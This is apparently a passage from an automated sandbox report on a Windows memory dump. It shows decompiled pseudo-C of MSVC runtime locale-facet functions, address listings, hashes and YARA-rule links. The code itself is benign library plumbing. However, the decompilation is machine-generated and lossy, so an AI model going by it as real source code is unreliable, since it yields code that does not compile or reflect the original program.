						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6D49C120(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t198 - 0x20);
							E6D4A3D74(_t198 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t184, _t189, 0x14);
							E6D486653(_t198 - 0x14, 0);
							_t190 =  *0x6d546e38; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6D46161C(0x6d546e18);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6D46171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6D4866BA(_t198 - 0x14);
								return E6D4A0075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6D49C1A4(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t198 - 0x20);
										E6D4A3D74(_t198 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t141, _t185, _t190, 0x14);
										E6D486653(_t198 - 0x14, 0);
										_t191 =  *0x6d546e40; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6D46161C(0x6d546e20);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6D46171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6D4866BA(_t198 - 0x14);
											return E6D4A0075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6D49C229(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t198 - 0x20);
													E6D4A3D74(_t198 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t141, _t186, _t191, 0x14);
													E6D486653(_t198 - 0x14, 0);
													_t192 =  *0x6d546e44; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6D46161C(0x6d546e24);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6D46171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6D4866BA(_t198 - 0x14);
														return E6D4A0075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6D49C295(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6D461438(_t169);
																E6D4A3D74(_t198 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6d4ec414;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6D49D028(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6D4A0075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6D486FD3(__eflags, _t187);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6d546e44 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6D486FD3(__eflags, _t186);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6d546e40 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6D486FD3(__eflags, _t185);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6d546e38 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6D486FD3(__eflags, _t184);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6d546e3c = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

0x6d49b9e4
0x6d49b9e4
0x6d49b9eb
0x6d49b9f5
0x6d49b9fa
0x6d49ba05
0x6d49ba09
0x6d49ba0c
0x6d49ba11
0x6d49ba15
0x6d49ba1a
0x6d49ba1e
0x6d49ba63
0x6d49ba66
0x6d49ba72
0x6d49ba20
0x6d49ba22
0x6d49ba28
0x6d49ba2e
0x6d49ba36
0x6d49ba39
0x6d49ba76
0x6d49ba84
0x6d49ba89
0x6d49ba91
0x6d49ba9b
0x6d49baa0
0x6d49baab
0x6d49baaf
0x6d49bab2
0x6d49bab7
0x6d49bac0
0x6d49bac2
0x6d49bac4
0x6d49bb09
0x6d49bb0c
0x6d49bb18
0x6d49bac6
0x6d49bac6
0x6d49bac8
0x6d49bace
0x6d49bad4
0x6d49badc
0x6d49badf
0x6d49bb1c
0x6d49bb2a
0x6d49bb2f
0x6d49bb37
0x6d49bb41
0x6d49bb46
0x6d49bb51
0x6d49bb55
0x6d49bb58
0x6d49bb5d
0x6d49bb66
0x6d49bb68
0x6d49bb6a
0x6d49bbaf
0x6d49bbb2
0x6d49bbbe
0x6d49bb6c
0x6d49bb6c
0x6d49bb6e
0x6d49bb74
0x6d49bb7a
0x6d49bb82
0x6d49bb85
0x6d49bbc2
0x6d49bbd0
0x6d49bbd5
0x6d49bbdd
0x6d49bbe7
0x6d49bbec
0x6d49bbf7
0x6d49bbfb
0x6d49bbfe
0x6d49bc03
0x6d49bc0c
0x6d49bc0e
0x6d49bc10
0x6d49bc55
0x6d49bc58
0x6d49bc64
0x6d49bc12
0x6d49bc12
0x6d49bc14
0x6d49bc1a
0x6d49bc20
0x6d49bc28
0x6d49bc2b
0x6d49bc65
0x6d49bc68
0x6d49bc76
0x6d49bc7b
0x6d49bc83
0x6d49bc88
0x6d49bc8a
0x6d49bc90
0x6d49bc93
0x6d49bc9c
0x6d49bc9c
0x6d49bc9c
0x6d49bca0
0x6d49bca6
0x6d49bca9
0x6d49bcb5
0x6d49bc2d
0x6d49bc2d
0x6d49bc30
0x6d49bc34
0x6d49bc38
0x6d49bc45
0x6d49bc4d
0x6d49bc4f
0x00000000
0x6d49bc4f
0x6d49bc16
0x6d49bc16
0x00000000
0x6d49bc16
0x6d49bc14
0x6d49bb87
0x6d49bb87
0x6d49bb8a
0x6d49bb8e
0x6d49bb92
0x6d49bb9f
0x6d49bba7
0x6d49bba9
0x00000000
0x6d49bba9
0x6d49bb70
0x6d49bb70
0x00000000
0x6d49bb70
0x6d49bb6e
0x6d49bae1
0x6d49bae1
0x6d49bae4
0x6d49bae8
0x6d49baec
0x6d49baf9
0x6d49bb01
0x6d49bb03
0x00000000
0x6d49bb03
0x6d49baca
0x6d49baca
0x00000000
0x6d49baca
0x6d49bac8
0x6d49ba3b
0x6d49ba3b
0x6d49ba3e
0x6d49ba42
0x6d49ba46
0x6d49ba53
0x6d49ba5b
0x6d49ba5d
0x00000000
0x6d49ba5d
0x6d49ba24
0x6d49ba24
0x00000000
0x6d49ba24
0x6d49ba22

APIs

__EH_prolog3.LIBCMT ref: 6D49B9EB
std::_Lockit::_Lockit.LIBCPMT ref: 6D49B9F5
int.LIBCPMT ref: 6D49BA0C

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

moneypunct.LIBCPMT ref: 6D49BA2F
std::_Facet_Register.LIBCPMT ref: 6D49BA46
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49BA66
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49BA84

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: bd8ec345e13c7a613dec032676fc6653c1fff697fcc4f5244f5034d9a88a75bf
Instruction ID: 16f829e6b6cee439fcc54bbd456746baf894cbef50d2ef0b633ef41033b55326
Opcode Fuzzy Hash: bd8ec345e13c7a613dec032676fc6653c1fff697fcc4f5244f5034d9a88a75bf
Instruction Fuzzy Hash: 7011C175808119DBCF00EB65C880FEEBBB4AF94314F1A400CD611AB290CB74DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F9F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48F9F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t242 - 0x14, 0);
				_t231 =  *0x6d546de0; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6D46161C(0x6d546d8c);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6D4866BA(_t242 - 0x14);
					return E6D4A0075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6D491471(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t242 - 0x20);
							E6D4A3D74(_t242 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t225, _t231, 0x14);
							E6D486653(_t242 - 0x14, 0);
							_t232 =  *0x6d546dfc; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6D46161C(0x6d546da8);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6D4866BA(_t242 - 0x14);
								return E6D4A0075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6D4914EC(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t242 - 0x20);
										E6D4A3D74(_t242 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t172, _t226, _t232, 0x14);
										E6D486653(_t242 - 0x14, 0);
										_t233 =  *0x6d546dcc; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6D46161C(0x6d546d80);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6D4866BA(_t242 - 0x14);
											return E6D4A0075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6D491558(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t242 - 0x20);
													E6D4A3D74(_t242 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t172, _t227, _t233, 0x14);
													E6D486653(_t242 - 0x14, 0);
													_t234 =  *0x6d546e00; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6D46161C(0x6d546dac);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6D4866BA(_t242 - 0x14);
														return E6D4A0075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6D4915C4(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t242 - 0x20);
																E6D4A3D74(_t242 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t172, _t228, _t234, 0x14);
																E6D486653(_t242 - 0x14, 0);
																_t235 =  *0x6d546dd0; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6D46161C(0x6d546d60);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6D46171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6D4866BA(_t242 - 0x14);
																	return E6D4A0075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6D49162A(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6D461438(_t207);
																			E6D4A3D74(_t242 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6d4ec0c4;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6D49542F(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6D4A0075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6D486FD3(__eflags, _t229);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6d546dd0 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6D486FD3(__eflags, _t228);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6d546e00 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6D486FD3(__eflags, _t227);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6d546dcc = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6D486FD3(__eflags, _t226);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6d546dfc = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6D486FD3(__eflags, _t225);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6d546de0 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

0x6d48f9f1
0x6d48f9f1
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa22
0x6d48fa27
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f

APIs

__EH_prolog3.LIBCMT ref: 6D48F9F8
std::_Lockit::_Lockit.LIBCPMT ref: 6D48FA02
int.LIBCPMT ref: 6D48FA19

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

numpunct.LIBCPMT ref: 6D48FA3C
std::_Facet_Register.LIBCPMT ref: 6D48FA53
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48FA73
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48FA91

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: feb34e8717756e17e73a0063b3157a0e15443a53fddfe4b77fb57d8c8a4219c4
Instruction ID: df4462f590d5526111450a937ccda4f043487feafc84dee4604a2156322f8cd7
Opcode Fuzzy Hash: feb34e8717756e17e73a0063b3157a0e15443a53fddfe4b77fb57d8c8a4219c4
Instruction Fuzzy Hash: 18119E758086299BCF05EBA4C844EEDB775AF94354F2A800DD612AB291DB74DD0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D49BA8A, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D49BA8A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t154 - 0x14, 0);
				_t147 =  *0x6d546e38; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6D46161C(0x6d546e18);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6D46171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6D4866BA(_t154 - 0x14);
					return E6D4A0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6D49C1A4(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t154 - 0x20);
							E6D4A3D74(_t154 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t143, _t147, 0x14);
							E6D486653(_t154 - 0x14, 0);
							_t148 =  *0x6d546e40; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6D46161C(0x6d546e20);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6D46171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6D4866BA(_t154 - 0x14);
								return E6D4A0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6D49C229(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t154 - 0x20);
										E6D4A3D74(_t154 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t110, _t144, _t148, 0x14);
										E6D486653(_t154 - 0x14, 0);
										_t149 =  *0x6d546e44; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6D46161C(0x6d546e24);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6D46171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6D4866BA(_t154 - 0x14);
											return E6D4A0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6D49C295(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6D461438(_t131);
													E6D4A3D74(_t154 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6d4ec414;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6D49D028(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6D4A0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6D486FD3(__eflags, _t145);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6d546e44 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6D486FD3(__eflags, _t144);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6d546e40 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6D486FD3(__eflags, _t143);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6d546e38 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

0x6d49ba8a
0x6d49ba8a
0x6d49ba91
0x6d49ba9b
0x6d49baa0
0x6d49baab
0x6d49baaf
0x6d49bab2
0x6d49bab7
0x6d49babb
0x6d49bac0
0x6d49bac4
0x6d49bb09
0x6d49bb0c
0x6d49bb18
0x6d49bac6
0x6d49bac8
0x6d49bace
0x6d49bad4
0x6d49badc
0x6d49badf
0x6d49bb1c
0x6d49bb2a
0x6d49bb2f
0x6d49bb37
0x6d49bb41
0x6d49bb46
0x6d49bb51
0x6d49bb55
0x6d49bb58
0x6d49bb5d
0x6d49bb66
0x6d49bb68
0x6d49bb6a
0x6d49bbaf
0x6d49bbb2
0x6d49bbbe
0x6d49bb6c
0x6d49bb6c
0x6d49bb6e
0x6d49bb74
0x6d49bb7a
0x6d49bb82
0x6d49bb85
0x6d49bbc2
0x6d49bbd0
0x6d49bbd5
0x6d49bbdd
0x6d49bbe7
0x6d49bbec
0x6d49bbf7
0x6d49bbfb
0x6d49bbfe
0x6d49bc03
0x6d49bc0c
0x6d49bc0e
0x6d49bc10
0x6d49bc55
0x6d49bc58
0x6d49bc64
0x6d49bc12
0x6d49bc12
0x6d49bc14
0x6d49bc1a
0x6d49bc20
0x6d49bc28
0x6d49bc2b
0x6d49bc65
0x6d49bc68
0x6d49bc76
0x6d49bc7b
0x6d49bc83
0x6d49bc88
0x6d49bc8a
0x6d49bc90
0x6d49bc93
0x6d49bc9c
0x6d49bc9c
0x6d49bc9c
0x6d49bca0
